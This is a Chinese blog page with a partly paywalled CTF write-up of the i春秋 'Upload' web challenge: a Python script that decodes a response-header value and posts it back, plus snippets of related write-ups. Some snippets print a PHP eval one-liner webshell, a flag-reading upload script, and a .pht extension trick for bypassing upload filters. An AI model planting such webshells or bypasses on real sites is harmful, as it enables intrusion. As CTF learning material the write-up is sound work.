i春秋Web-Upload(第一届“百度杯”信息安全攻防总决赛 线上选拔赛)

最新推荐文章于 2024-04-22 17:07:01 发布
原创 最新推荐文章于 2024-04-22 17:07:01 发布 · 2.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#i春秋Web #.svn泄露

本文介绍了参加i春秋Web安全比赛时遇到的上传挑战,包括寻找隐藏参数、通过响应头获取flag、爆破验证码、发现svn泄露并访问wc.db数据库文件,最终利用文件上传漏洞获取flag的过程。

查看源码:

 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头:

 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了:
 

import requests
import base64

url = 'http://dc587a4fbff74976b22f2bd18ec43caecfed2293ecc7495d.changame.ichunqiu.com/'
s = requests.session()
r = s.get(url)
fh = r.headers["flag"]
b = base64.b64decode(fh)
f = str(b).split(':')
data = base64.b64decode(f[1])
payload = {"ichunqiu":data}
fl = s.post(url, data = payload)
print(fl.text)

得到:3712901a08bb58557943ca31f3487b7d

然后访问这个路径,进入一个登陆界面:

最低0.47元/天 解锁文章
第一届百度信息安全攻防总决赛 线选拔赛 Upload
feng的博客
10-03 1369
前言 有一说一,这题应该算是比较全面,而且难度适中的一题。全是都是固定的套路,知道怎么绕过, 怎么去做,就很简单。我做的时候卡在了第一个点上。。只能说,凡是遇到写python脚本的我都没做出来过。唉。还是畏惧了。因为python很差,遇到题目自己的思路里就没有写python脚本。还是能力的问题,需要加强。 WP 首先进入环境,提示我们要做个fast man。我的第一反应是302跳转,但其实是写python脚本去post。f12看看源代码发现了:Please post the ichunqiu what yo
第一届百度信息安全攻防总决赛 线选拔赛
weixin_52033041的博客
11-16 1215
第一届百度信息安全攻防总决赛 线选拔赛 类型:MISC 题目:find the flag 下载文件是一个cap包 里面并没有,我还傻乎乎的找。。。。。。。。。。。 其实这个文件损坏了,需要进行修复,这里说一个简单的方法! 在windows下用txt打开 搜索:where is the flag 发没发现有些奇怪???? lf 和ga 反过来fl和ag 然后链接起来是不是flag!!!! 然后就是漫长的拼接。。。。 得到flag:flag{aha!_you_found_it!} 此题出自i
Web-Upload[i春秋][50pt]
Laurel_60的博客
08-05 1420
> 去年写的,后面有点问题,懒得改了,要看就直接去翻我重写的另一篇吧2333 > https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload
i春秋-web-upload(文件内容读取)(百度”九月场)
Sea_Sand息禅
01-16 678
提示很明显,flag在flag.php中,所以,任务就是获取flag.php的内容。 方法一:一句话+菜刀(不再叙述) 方法二:上传脚本,使脚本拥有一定权限,再输出flag 先造一个php脚本 <script language="PHP"> echo((file_get_contents('flag.'.'p'.'h'.'p'))); </script> ...
第一届百度信息安全攻防总决赛_Upload
a173262565的博客
04-09 344
题目见i春秋ctf训练营 看到fast,就想抓个包看看,以前有道题是打开链接直接来了个跳转,当然这题不是 查看返回包,发现一个好东西 拿去base64解码看看 感觉给出的字符串能继续解码,果然解码后得到一串数字 根据提示要把这串数字以post方式提交,变量名为ichunqiu 看到返回的是fast!!!,看来我的手速是满足不了ichunqiu...
百度信息安全攻防总决赛 Upload
wjd19980925的博客
04-12 514
第一届百度信息安全攻防总决赛Upload
CTF-WEB攻防世界题目实战解析upload1
最新发布
2301_76565920的博客
04-22 1827
题目:upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
i 春秋CTF题目 百度 9月场 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1781
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋-百度”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-优快云博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
第一届百度信息安全攻防总决赛 web Upload
烟敛寒林的博客
05-13 1715
进入题目后 先查看页面源代码: 就是说post发送ichunqiu=你发现的东西 抓包发送到repeater base64解密 猜测 大概能再解码一次 得到一串数字 post方式发送ichunqiu=这串数字 页面反显fast,说明我们得用脚本跑 import base64,requests def main(): a = re...
第一届百度信息安全攻防总决赛
dfdhxb995397的博客
03-15 610
第一届百度信息安全攻防总决赛(3月15-3月26) 比赛通道:第一届百度信息安全攻防总决赛比赛通道 百度已经陪伴大家度过了七个月, 共计23场比赛 覆盖了i春秋30w+用户、国内全部CTF人群 共计发放奖金10w+元 也有过5次升级 现在,第一届百度即将迎来总决赛! 先让我们来回顾一下,百度是什...
百度CTF比赛二月第三场比赛(Reverse专题赛)CrackMe-1题目
03-30
百度CTF比赛二月第三场比赛(Reverse专题赛)CrackMe-1题目。
第一届百度信息安全攻防总决赛-----Upload
大方子
08-04 2133
  ================================== 个人收获: 1.某个加密方式可能使用2遍 2.后缀改为pht可绕过上传限制解析为php       ======================================   题目界面: 利用burp没有发现302跳转 但是在源码里面发现这段 就是说用post的方法发送ichunqiu...
i春秋WEBUpload
金 帛的博客
02-12 556
i春秋webWP
百度 Upload
qq_40273198的博客
04-26 560
访问赛题 URL, 返回包如下HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Type: text/html Content-Length: 87 Connection: keep-alive X-Powered-By: PHP/5.5.9-1ubuntu4.19 Set-Cookie...
第一届百度信息安全攻防总决赛 find the flag WP
豆傻小饼干随记
06-06 2499
打开图片后发现流量包有问题,于是使用http://f00l.de/hacking/pcapfix.php修复流量包,在流量包中有提示 发现当帧长度为72时,每个id的逆序值符合格式要求,于是编写脚本 #!/usr/bin/env python # -*- coding:utf-8 -*- # -- author:valecalida -- # Edit time: 2021/6/6 8:35 from pyshark import FileCapture from binascii impo...
暑期web10:基础的文件上传upload(i春秋)、上传绕过(实验吧)
qq_41618162的博客
08-18 2916
介于之前做了个包括文件上传步骤的题,突然想拿两个之前做过的文件上传题来回顾一下一些基础做法 首先是实验吧的上传绕过 首先我们上传最基础的一句话木马:<?php @eval($_POST['pass']);?> 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传,又回显‘必须上传后缀名为php的文件才行’ 做成php...
百度” CTF比赛 九月场 Web-Upload
qq_34106499的博客
01-14 589
1. php一句话木马编写及使用(长标签); 2. 上传文件绕过 ` <? ' , ' php ' 的方法; 3. 菜刀连接php一句话木马;
百度”CTF比赛 九月场 Upload
weixin_43858799的博客
05-19 623
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件来获取到flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
百度2017-九月场-upload
weixin_43622501的博客
11-25 171
Upload 题目描述: 提示flag在flag.php中。应该是文件包含类型。 进入题目: 首先尝试进入flag.php文件 http://e72bd1791da64736ae8929a2cac71695278337f40de044bb.game.ichunqiu.com/flag.php 发现提示 here_is_flag 推测就在这个文件里但是被隐藏了,想办法读这个文件的内容。 用之前学...
Ruby实现安全文件上传的rack-secure-upload工具
标题《Ruby-racksecureupload安全地上传文件》和描述《rack-secure-upload - 安全地上传文件》指向了Ruby语言环境下一个用于安全处理文件上传的库。在Ruby开发中,文件上传是一个常见的功能需求,但同时也带来了安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值